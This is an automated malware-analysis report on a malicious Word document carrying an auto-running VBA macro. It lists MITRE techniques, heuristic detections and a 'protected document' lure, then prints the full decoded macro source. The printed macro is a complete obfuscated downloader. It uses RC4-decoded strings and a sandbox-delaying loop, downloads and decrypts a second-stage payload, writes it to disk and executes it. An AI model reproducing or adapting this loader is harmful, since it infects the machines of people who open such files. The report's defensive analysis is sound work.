MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1027 Obfuscated Files or Information
T1204.002 Malicious File
The sample is an Office document containing a VBA macro that is heavily obfuscated and designed to execute automatically upon opening. The document body presents a 'protected document' lure, instructing the user to enable editing and content, which is a common tactic to bypass macro security. The VBA code utilizes CreateObject and appears to be a loader for a second-stage payload, as indicated by the critical heuristic firings for obfuscated auto-exec loaders and p-code execution.
Heuristics 10
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
PIPejz = Environ(LRnNiPV88Rq(QYmk("022F7855E4DF88"), "PC9ry5nETxy")) & "\" & MAYA9Ttqp & LRnNiPV88Rq(QYmk("8042ECBC"), "T7G2WMTxy") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15536 bytes |
SHA-256: ccd02143fb85219c6840c7926d7f59e3b9dbc04de46c9d1a965262355af274f6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
118 of 214 identifiers look randomly generated (e.g. 'B95BA117F4336D6AB000907F79B36F77C1ADF445'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KIoFyyqDDpQCMw Lib "kernel32" Alias "_lcreat" (ByVal DnmC2Tum2Fdi As String, ByVal ATZftfS1vZ29Gl As Long) As Long
Private Declare PtrSafe Function J4GBRF1MBKoJoQj5 Lib "kernel32" Alias "_lwrite" (ByVal UF7kaK2y As Long, IifEjI5MA As Any, ByVal LkHm9tZlRI32h As Long) As Long
Private Declare PtrSafe Function OuW44m Lib "kernel32" Alias "_lclose" (ByVal IWwvFgZit As Long) As Long
#Else
Private Declare Function KIoFyyqDDpQCMw Lib "kernel32" Alias "_lcreat" (ByVal DnmC2Tum2Fdi As String, ByVal ATZftfS1vZ29Gl As Long) As Long
Private Declare Function OuW44m Lib "kernel32" Alias "_lclose" (ByVal IWwvFgZit As Long) As Long
Private Declare Function J4GBRF1MBKoJoQj5 Lib "kernel32" Alias "_lwrite" (ByVal UF7kaK2y As Long, IifEjI5MA As Any, ByVal LkHm9tZlRI32h As Long) As Long
#End If
Sub Document_Open()
Dim MaB14scvj1 As Long, SVOBv2aUdQRx7T4 As Long
MaB14scvj1 = 25
SVOBv2aUdQRx7T4 = 89
If MaB14scvj1 + SVOBv2aUdQRx7T4 > 2 Then
SVOBv2aUdQRx7T4 = MaB14scvj1 + 23
Else
SVOBv2aUdQRx7T4 = 95 + 4 + 53
End If
On Error Resume Next
Dim XRHEddANHBSYcpjR As Long, HQ5G0sAPY As Long
XRHEddANHBSYcpjR = 26
HQ5G0sAPY = 85
If XRHEddANHBSYcpjR + HQ5G0sAPY > 2 Then
HQ5G0sAPY = XRHEddANHBSYcpjR + 32
Else
HQ5G0sAPY = 66 + 17 + 67
End If
Dim YmmlU8OQ As Long, WrImQEkr As Long, Lkdr As Long
Dim W1zKDbl4l As Long, VT8pPQ0SxbE As Long
W1zKDbl4l = 75
VT8pPQ0SxbE = 37
If W1zKDbl4l + VT8pPQ0SxbE > 2 Then
VT8pPQ0SxbE = W1zKDbl4l + 54
Else
VT8pPQ0SxbE = 55 + 52 + 61
End If
YmmlU8OQ = 955492744: WrImQEkr = 0: Lkdr = 0
Dim B1tv5EZOSiaGh As Long, SgGv2GqQA9 As Long
B1tv5EZOSiaGh = 83
SgGv2GqQA9 = 39
If B1tv5EZOSiaGh + SgGv2GqQA9 > 2 Then
SgGv2GqQA9 = B1tv5EZOSiaGh + 47
Else
SgGv2GqQA9 = 74 + 94 + 34
End If
For WrImQEkr = 1 To YmmlU8OQ
Lkdr = Lkdr + 1
Next WrImQEkr
Dim G8k4eRxRpGJofVXm As Long, UYvPY4XIyc9LAMy As Long
G8k4eRxRpGJofVXm = 78
UYvPY4XIyc9LAMy = 67
If G8k4eRxRpGJofVXm + UYvPY4XIyc9LAMy > 2 Then
UYvPY4XIyc9LAMy = G8k4eRxRpGJofVXm + 2
Else
UYvPY4XIyc9LAMy = 96 + 40 + 82
End If
If Lkdr = YmmlU8OQ Then
Dim Vfdk3At As Long, BLZNRwk7FZYfKq As Long
Vfdk3At = 77
BLZNRwk7FZYfKq = 70
If Vfdk3At + BLZNRwk7FZYfKq > 2 Then
BLZNRwk7FZYfKq = Vfdk3At + 92
Else
BLZNRwk7FZYfKq = 25 + 53 + 68
End If
Dim Nu3zOiVX8T As Long, Cc9LAMykkhM As Long
Nu3zOiVX8T = 52
Cc9LAMykkhM = 71
If Nu3zOiVX8T + Cc9LAMykkhM > 2 Then
Cc9LAMykkhM = Nu3zOiVX8T + 61
Else
Cc9LAMykkhM = 18 + 48 + 84
End If
IQOC3Z
Dim F7DVXiTngHSggu3 As Long, YBjY As Long
F7DVXiTngHSggu3 = 53
YBjY = 68
If F7DVXiTngHSggu3 + YBjY > 2 Then
YBjY = F7DVXiTngHSggu3 + 71
Else
YBjY = 89 + 35 + 25
End If
Else
Dim JGDHIqplImNF As Long, PkkhMKgWyj As Long
JGDHIqplImNF = 23
PkkhMKgWyj = 60
If JGDHIqplImNF + PkkhMKgWyj > 2 Then
PkkhMKgWyj = JGDHIqplImNF + 49
Else
PkkhMKgWyj = 29 + 89 + 7
End If
MEZ88luYpUmX1J
Dim Sd1CeY9q3xJw8 As Long, VlA4x As Long
Sd1CeY9q3xJw8 = 60
VlA4x = 96
If Sd1CeY9q3xJw8 + VlA4x > 2 Then
VlA4x = Sd1CeY9q3xJw8 + 13
Else
VlA4x = 92 + 53 + 44
End If
End If
Dim ETiSwpkV8 As Long, FqUD4Z1MqIu4oL As Long
ETiSwpkV8 = 55
FqUD4Z1MqIu4oL = 65
If ETiSwpkV8 + FqUD4Z1MqIu4oL > 2 Then
FqUD4Z1MqIu4oL = ETiSwpkV8 + 80
Else
FqUD4Z1MqIu4oL = 60 + 21 + 39
End If
End Sub
Function QYmk(KuSwmJkmPIwq As String) As String
Dim UfJvbAN As Long, DorffyXxZm As Long
UfJvbAN = 58
DorffyXxZm = 3
If UfJvbAN + DorffyXxZm > 2 Then
DorffyXxZm = UfJvbAN + 21
Else
DorffyXxZm = 66 + 30 + 86
End If
Dim K6BGGvYl6U As Integer
Dim Pq8C As Long, QrG5Etj9lfJ As Long
Pq8C = 70
QrG5Etj9lfJ = 17
If Pq8C + QrG5Etj9lfJ > 2 Then
QrG5Etj9lfJ = Pq8C + 51
Else
QrG5Etj9lfJ = 74 + 52 + 47
End If
For K6BGGvYl6U = 1 To Len(KuSwmJkmPIwq) Step 2
QYmk = QYmk & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(KuSwmJkmPIwq, K6BGGvYl6U, 2)))
Next
Dim OW0bVxbLxme As Long, PsHR3Kkm2p0A As Long
OW0bVxbLxme = 2
PsHR3Kkm2p0A = 86
If OW0bVxbLxme + PsHR3Kkm2p0A > 2 Then
PsHR3Kkm2p0A = OW0bVxbLxme + 79
Else
PsHR3Kkm2p0A = 2 + 34 + 62
End If
End Function
Sub MEZ88luYpUmX1J()
Dim MXlJRMaj9V As Long, YPH6nwiudOpqTUyRu As Long
MXlJRMaj9V = 58
YPH6nwiudOpqTUyRu = 92
If MXlJRMaj9V + YPH6nwiudOpqTUyRu > 2 Then
YPH6nwiudOpqTUyRu = MXlJRMaj9V + 16
Else
YPH6nwiudOpqTUyRu = 92 + 87 + 75
End If
App.LogEvent "J3F3bYZ8ZyXizNYB"
Hour 79
Sqr 80
JrXj7vltnOc = LCase(77)
FreeFile 86
If CDbl(31) = True Then YVodsEQdmWOMuL = 44
KKp1KyqesejHSv = Fix(58)
Command
PArPnlxlz7 = CVDate(17)
TmeztnFX7 = QBColor(42)
FV 40, 71, 78
DDB 83, 67, 16, 45
Log 31
Resume
If CCur(65) = True Then BHp0A = 6910
GetAllSettings 64, 73
App.StartLogging "C5kSULD", 92
Sin 60
If Abs(85) = 35 Then MYanRen = 3587
DatePart "KEyM5AN1dUBw6", 4
If IsMissing(28) = True Then FyL3wu8ALiFqDYM = 81
Randomize
LGpO48AB = EOF(20)
TimeValue 79
Year 26
InputBox 60, 11, 61, 82, 70
QMuqRwGgNtXQBI = UCase(6)
Atn 73
G9zYJYSX = Cos(10)
Round 18, 86
Dim Xhw7XNqeZsBMOjs As Long, BJjcPUZ5Q As Long
Xhw7XNqeZsBMOjs = 18
BJjcPUZ5Q = 13
If Xhw7XNqeZsBMOjs + BJjcPUZ5Q > 2 Then
BJjcPUZ5Q = Xhw7XNqeZsBMOjs + 1
Else
BJjcPUZ5Q = 36 + 30 + 74
End If
End Sub
Function MAYA9Ttqp() As String
Dim ChADsyA As Long, VTbGd9ZdvIVY As Long
ChADsyA = 29
VTbGd9ZdvIVY = 5
If ChADsyA + VTbGd9ZdvIVY > 2 Then
VTbGd9ZdvIVY = ChADsyA + 23
Else
VTbGd9ZdvIVY = 68 + 59 + 16
End If
Dim W7qcQl1755D409Yny() As Byte, XJYwuNp6mCxaiARE() As Byte, IWvy1VcHFg167ik8g As Long, F1C61dDvPVF As Long, GvFSSwihBCsmlT As String, CRAI5afc9 As String, DzUZI9fMYYWR65cM4 As Long
Dim RbBSb70Jv As Long, G8k0rbJdd6wjXx As Long
RbBSb70Jv = 57
G8k0rbJdd6wjXx = 93
If RbBSb70Jv + G8k0rbJdd6wjXx > 2 Then
G8k0rbJdd6wjXx = RbBSb70Jv + 10
Else
G8k0rbJdd6wjXx = 89 + 50 + 41
End If
DzUZI9fMYYWR65cM4 = 0
Dim IFOXGjnsjkXV As Long, IivxfQYR As Long
IFOXGjnsjkXV = 20
IivxfQYR = 31
If IFOXGjnsjkXV + IivxfQYR > 2 Then
IivxfQYR = IFOXGjnsjkXV + 46
Else
IivxfQYR = 26 + 86 + 5
End If
DpUmX1JQWa:
Dim UTv27 As Long, Aj0OxjzXN As Long
UTv27 = 78
Aj0OxjzXN = 30
If UTv27 + Aj0OxjzXN > 2 Then
Aj0OxjzXN = UTv27 + 2
Else
Aj0OxjzXN = 33 + 40 + 45
End If
Randomize
CRAI5afc9 = Int(30 * Rnd)
If CRAI5afc9 < 4 Then GoTo DpUmX1JQWa
DzUZI9fMYYWR65cM4 = CRAI5afc9
If DzUZI9fMYYWR65cM4 > 0& Then
Dim UN4tlQL As Long, YdaMPsTw As Long
UN4tlQL = 56
YdaMPsTw = 97
If UN4tlQL + YdaMPsTw > 2 Then
YdaMPsTw = UN4tlQL + 18
Else
YdaMPsTw = 37 + 27 + 83
End If
GvFSSwihBCsmlT = LRnNiPV88Rq(QYmk("9AA09A8695A94A8A4C0C"), "SAVio0tlP")
Randomize
W7qcQl1755D409Yny = GvFSSwihBCsmlT
IWvy1VcHFg167ik8g = Len(GvFSSwihBCsmlT) - 1&
DzUZI9fMYYWR65cM4 = (DzUZI9fMYYWR65cM4 * 2&) - 1&
ReDim XJYwuNp6mCxaiARE(DzUZI9fMYYWR65cM4) As Byte
Dim WyvCIEhqPkl1 As Long, Rug5Zwp6dTIh As Long
WyvCIEhqPkl1 = 27
Rug5Zwp6dTIh = 24
If WyvCIEhqPkl1 + Rug5Zwp6dTIh > 2 Then
Rug5Zwp6dTIh = WyvCIEhqPkl1 + 33
Else
Rug5Zwp6dTIh = 5 + 90 + 5
End If
For F1C61dDvPVF = 0& To DzUZI9fMYYWR65cM4 Step 2&
XJYwuNp6mCxaiARE(F1C61dDvPVF) = W7qcQl1755D409Yny(CLng(IWvy1VcHFg167ik8g * Rnd) * 2&)
Next
Dim DN7wVcbfbp As Long, IGT0t0lsH3le9aFHH As Long
DN7wVcbfbp = 60
IGT0t0lsH3le9aFHH = 70
If DN7wVcbfbp + IGT0t0lsH3le9aFHH > 2 Then
IGT0t0lsH3le9aFHH = DN7wVcbfbp + 41
Else
IGT0t0lsH3le9aFHH = 54 + 68 + 51
End If
End If
Dim JkmI62nq2AkUBzsRY As Long, F796jiT05 As Long
JkmI62nq2AkUBzsRY = 88
F796jiT05 = 86
If JkmI62nq2AkUBzsRY + F796jiT05 > 2 Then
F796jiT05 = JkmI62nq2AkUBzsRY + 18
Else
F796jiT05 = 25 + 30 + 14
End If
MAYA9Ttqp = XJYwuNp6mCxaiARE
Dim OUw1K1Yk1AI As Long, APp41c8e7BaBRH As Long
OUw1K1Yk1AI = 44
APp41c8e7BaBRH = 44
If OUw1K1Yk1AI + APp41c8e7BaBRH > 2 Then
APp41c8e7BaBRH = OUw1K1Yk1AI + 96
Else
APp41c8e7BaBRH = 14 + 37 + 91
End If
End Function
Function LRnNiPV88Rq(ByVal HTJg5RAL As String, ByVal PvXuooa6Q As String) As String
Dim CpEzb0Co6n As Long, O0PbG87wlOP7R As Long
CpEzb0Co6n = 79
O0PbG87wlOP7R = 12
If CpEzb0Co6n + O0PbG87wlOP7R > 2 Then
O0PbG87wlOP7R = CpEzb0Co6n + 41
Else
O0PbG87wlOP7R = 81 + 58 + 76
End If
On Error Resume Next
Dim AJyPmojem8Ev5HP As Long, YNDWb1fJ0Gb9QoHRu As Long
AJyPmojem8Ev5HP = 27
YNDWb1fJ0Gb9QoHRu = 95
If AJyPmojem8Ev5HP + YNDWb1fJ0Gb9QoHRu > 2 Then
YNDWb1fJ0Gb9QoHRu = AJyPmojem8Ev5HP + 17
Else
YNDWb1fJ0Gb9QoHRu = 28 + 21 + 43
End If
Dim HEf7AK1JYyt(0 To 255) As Integer, HKX4hVu As Long, UZkUHAWL As Long, SQjc7ICu As Long, JoVxkvpGIJS() As Byte, IcndGJ1Haqr0Mdjm2() As Byte, PYmfHnajj As Byte
Dim P87wlOP7RbEGLf As Long, DHFslWz3Rl As Long
P87wlOP7RbEGLf = 55
DHFslWz3Rl = 65
If P87wlOP7RbEGLf + DHFslWz3Rl > 2 Then
DHFslWz3Rl = P87wlOP7RbEGLf + 10
Else
DHFslWz3Rl = 23 + 36 + 94
End If
JoVxkvpGIJS() = StrConv(PvXuooa6Q, vbFromUnicode)
Dim I0kiQrXUGh8jgH As Long, DR831vgAw As Long
I0kiQrXUGh8jgH = 77
DR831vgAw = 46
If I0kiQrXUGh8jgH + DR831vgAw > 2 Then
DR831vgAw = I0kiQrXUGh8jgH + 12
Else
DR831vgAw = 16 + 55 + 11
End If
For HKX4hVu = 0 To 255
HEf7AK1JYyt(HKX4hVu) = HKX4hVu
Next HKX4hVu
HKX4hVu = 0
UZkUHAWL = 0
SQjc7ICu = 0
For HKX4hVu = 0 To 255
UZkUHAWL = (UZkUHAWL + HEf7AK1JYyt(HKX4hVu) + JoVxkvpGIJS(HKX4hVu Mod Len(PvXuooa6Q))) Mod 256
PYmfHnajj = HEf7AK1JYyt(HKX4hVu)
HEf7AK1JYyt(HKX4hVu) = HEf7AK1JYyt(UZkUHAWL)
HEf7AK1JYyt(UZkUHAWL) = PYmfHnajj
Next HKX4hVu
HKX4hVu = 0
UZkUHAWL = 0
SQjc7ICu = 0
IcndGJ1Haqr0Mdjm2() = StrConv(HTJg5RAL, vbFromUnicode)
For HKX4hVu = 0 To Len(HTJg5RAL)
UZkUHAWL = (UZkUHAWL + 1) Mod 256
SQjc7ICu = (SQjc7ICu + HEf7AK1JYyt(UZkUHAWL)) Mod 256
PYmfHnajj = HEf7AK1JYyt(UZkUHAWL)
HEf7AK1JYyt(UZkUHAWL) = HEf7AK1JYyt(SQjc7ICu)
HEf7AK1JYyt(SQjc7ICu) = PYmfHnajj
IcndGJ1Haqr0Mdjm2(HKX4hVu) = IcndGJ1Haqr0Mdjm2(HKX4hVu) Xor (HEf7AK1JYyt((HEf7AK1JYyt(UZkUHAWL) + HEf7AK1JYyt(SQjc7ICu)) Mod 256))
Next HKX4hVu
Dim Lm5faFiviTJzL0z As Long, CFPmJoQwD As Long
Lm5faFiviTJzL0z = 28
CFPmJoQwD = 29
If Lm5faFiviTJzL0z + CFPmJoQwD > 2 Then
CFPmJoQwD = Lm5faFiviTJzL0z + 26
Else
CFPmJoQwD = 36 + 7 + 20
End If
LRnNiPV88Rq = StrConv(IcndGJ1Haqr0Mdjm2, vbUnicode)
Dim VVTXeuz5PW As Long, H3vwNHw1H2 As Long
VVTXeuz5PW = 56
H3vwNHw1H2 = 46
If VVTXeuz5PW + H3vwNHw1H2 > 2 Then
H3vwNHw1H2 = VVTXeuz5PW + 3
Else
H3vwNHw1H2 = 33 + 68 + 8
End If
End Function
Sub IQOC3Z()
Dim PEuDRnFTCkvBVsi As Long, FEm3u0JE8Nyfm As Long
PEuDRnFTCkvBVsi = 36
FEm3u0JE8Nyfm = 71
If PEuDRnFTCkvBVsi + FEm3u0JE8Nyfm > 2 Then
FEm3u0JE8Nyfm = PEuDRnFTCkvBVsi + 65
Else
FEm3u0JE8Nyfm = 9 + 51 + 98
End If
Dim PIPejz As String, Dtcu3LFMUXYSae As Object
Dim IpisXAfQlak As Long, XT0mICcmBlItf3 As Long
IpisXAfQlak = 89
XT0mICcmBlItf3 = 84
If IpisXAfQlak + XT0mICcmBlItf3 > 2 Then
XT0mICcmBlItf3 = IpisXAfQlak + 72
Else
XT0mICcmBlItf3 = 8 + 2 + 46
End If
PIPejz = Environ(LRnNiPV88Rq(QYmk("022F7855E4DF88"), "PC9ry5nETxy")) & "\" & MAYA9Ttqp & LRnNiPV88Rq(QYmk("8042ECBC"), "T7G2WMTxy")
Dim BFfuO0mJALyMLC As Long, P8NfMYMEQHpp As Long
BFfuO0mJALyMLC = 27
P8NfMYMEQHpp = 72
If BFfuO0mJALyMLC + P8NfMYMEQHpp > 2 Then
P8NfMYMEQHpp = BFfuO0mJALyMLC + 62
Else
P8NfMYMEQHpp = 19 + 23 + 85
End If
Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1"))
Dim U7TKtRz1 As Long, Vgb7Bhjn As Long
U7TKtRz1 = 86
Vgb7Bhjn = 93
If U7TKtRz1 + Vgb7Bhjn > 2 Then
Vgb7Bhjn = U7TKtRz1 + 44
Else
Vgb7Bhjn = 21 + 16 + 5
End If
Dtcu3LFMUXYSae.Open LRnNiPV88Rq(QYmk("776E05"), "NMUNTECAc"), LRnNiPV88Rq(QYmk("418B95BA117F4336D6AB000907F79B36F77C1ADF445AB13C099211"), "Ic5tp7VhfU"), False
Dim WtAxz8aTF6JqGas As Long, QiDpp As Long
WtAxz8aTF6JqGas = 97
QiDpp = 34
If WtAxz8aTF6JqGas + QiDpp > 2 Then
QiDpp = WtAxz8aTF6JqGas + 50
Else
QiDpp = 30 + 90 + 81
End If
Dtcu3LFMUXYSae.setRequestHeader LRnNiPV88Rq(QYmk("5E260FC785336E7441B6"), "VbayGiNVCcs58tA6e"), LRnNiPV88Rq(QYmk("0B6782D6862B22045A10E2"), "BiBKRvlNIhab8T")
Dtcu3LFMUXYSae.send
If Dtcu3LFMUXYSae.readyState = 4 And Dtcu3LFMUXYSae.Status = 200 Then
Dim UajY As Long, TNzOFRr As Long
UajY = 84
TNzOFRr = 25
If UajY + TNzOFRr > 2 Then
TNzOFRr = UajY + 51
Else
TNzOFRr = 26 + 52 + 95
End If
YBzgAFu09E9pbFA PIPejz, LRnNiPV88Rq(StrConv(Dtcu3LFMUXYSae.ResponseBody, vbUnicode), LRnNiPV88Rq(QYmk("5B548A693199A1DB7B"), "VU9mbc5L0"))
Dim IwuqFMfk As Long, RBnig7Bd As Long
IwuqFMfk = 27
RBnig7Bd = 59
If IwuqFMfk + RBnig7Bd > 2 Then
RBnig7Bd = IwuqFMfk + 11
Else
RBnig7Bd = 10 + 40 + 21
End If
POu2LPdA 1
Dim WHk5Kbjdsfj As Long, DyWO60b As Long
WHk5Kbjdsfj = 27
DyWO60b = 7
If WHk5Kbjdsfj + DyWO60b > 2 Then
DyWO60b = WHk5Kbjdsfj + 67
Else
DyWO60b = 85 + 86 + 82
End If
CreateObject(LRnNiPV88Rq(QYmk("4349CAA4295D35032FFB81C1DD"), "MAm6l7wxtuJt")).exec """" & PIPejz & """"
Dim ABnig7Bd As Long, JEU1nf0myzb As Long
ABnig7Bd = 34
JEU1nf0myzb = 12
If ABnig7Bd + JEU1nf0myzb > 2 Then
JEU1nf0myzb = ABnig7Bd + 52
Else
JEU1nf0myzb = 33 + 16 + 42
End If
End If
Dim HOaAFi As Long, OGNqsP As Long
HOaAFi = 2
OGNqsP = 11
If HOaAFi + OGNqsP > 2 Then
OGNqsP = HOaAFi + 37
Else
OGNqsP = 30 + 97 + 23
End If
Set Dtcu3LFMUXYSae = Nothing
Dim HZSDZpR5z As Long, VzA7aBVeU02x4N06 As Long
HZSDZpR5z = 52
VzA7aBVeU02x4N06 = 58
If HZSDZpR5z + VzA7aBVeU02x4N06 > 2 Then
VzA7aBVeU02x4N06 = HZSDZpR5z + 42
Else
VzA7aBVeU02x4N06 = 89 + 45 + 5
End If
End Sub
Sub POu2LPdA(OY0nedJWb0 As Long)
Dim YL8zIdaJ As Long, CzR3B5XxI0PShI As Long
YL8zIdaJ = 2
CzR3B5XxI0PShI = 95
If YL8zIdaJ + CzR3B5XxI0PShI > 2 Then
CzR3B5XxI0PShI = YL8zIdaJ + 40
Else
CzR3B5XxI0PShI = 9 + 29 + 40
End If
Dim EXsq2t As Long
Dim ONlXAHWBVK As Long, TQFLEyWneibv As Long
ONlXAHWBVK = 12
TQFLEyWneibv = 20
If ONlXAHWBVK + TQFLEyWneibv > 2 Then
TQFLEyWneibv = ONlXAHWBVK + 69
Else
TQFLEyWneibv = 20 + 41 + 30
End If
EXsq2t = Timer + OY0nedJWb0
Do While Timer < EXsq2t
DoEvents
Loop
Dim G8L8z As Long, LIn3rq2itr As Long
G8L8z = 78
LIn3rq2itr = 66
If G8L8z + LIn3rq2itr > 2 Then
LIn3rq2itr = G8L8z + 2
Else
LIn3rq2itr = 95 + 40 + 9
End If
End Sub
Function YBzgAFu09E9pbFA(T4OKy2XuOs As String, T582uRVQPNARgwe As String)
Dim EjTdrGHOVFY As Long, Sh334QnLsnviJECLE As Long
EjTdrGHOVFY = 32
Sh334QnLsnviJECLE = 31
If EjTdrGHOVFY + Sh334QnLsnviJECLE > 2 Then
Sh334QnLsnviJECLE = EjTdrGHOVFY + 61
Else
Sh334QnLsnviJECLE = 68 + 74 + 58
End If
Dim CPfgD2h3uL As Long
Dim MKiPQ4B4Scq7 As Long, DAUUoGKrlQJRQFZjV As Long
MKiPQ4B4Scq7 = 43
DAUUoGKrlQJRQFZjV = 98
If MKiPQ4B4Scq7 + DAUUoGKrlQJRQFZjV > 2 Then
DAUUoGKrlQJRQFZjV = MKiPQ4B4Scq7 + 58
Else
DAUUoGKrlQJRQFZjV = 27 + 19 + 96
End If
CPfgD2h3uL = KIoFyyqDDpQCMw(T4OKy2XuOs, 128)
Dim TR6dlb3hw5yZDhsW As Long, THD0XHDrHxgEeY5 As Long
TR6dlb3hw5yZDhsW = 6
THD0XHDrHxgEeY5 = 35
If TR6dlb3hw5yZDhsW + THD0XHDrHxgEeY5 > 2 Then
THD0XHDrHxgEeY5 = TR6dlb3hw5yZDhsW + 21
Else
THD0XHDrHxgEeY5 = 90 + 56 + 60
End If
J4GBRF1MBKoJoQj5 CPfgD2h3uL, ByVal T582uRVQPNARgwe, Len(T582uRVQPNARgwe)
Dim JnjaEVGirv As Long, Q13Obwv6ALtL As Long
JnjaEVGirv = 77
Q13Obwv6ALtL = 57
If JnjaEVGirv + Q13Obwv6ALtL > 2 Then
Q13Obwv6ALtL = JnjaEVGirv + 18
Else
Q13Obwv6ALtL = 35 + 36 + 33
End If
OuW44m CPfgD2h3uL
Dim LYcxr6Oa9WbGMn As Long, HkRFebkLGLiC As Long
LYcxr6Oa9WbGMn = 18
HkRFebkLGLiC = 63
If LYcxr6Oa9WbGMn + HkRFebkLGLiC > 2 Then
HkRFebkLGLiC = LYcxr6Oa9WbGMn + 27
Else
HkRFebkLGLiC = 83 + 14 + 76
End If
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 38400 bytes |
SHA-256: eded62f7fe53ddafc011ce9b7c8eaa4fe4e8039e939bfa279ea405536fb65d61 |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.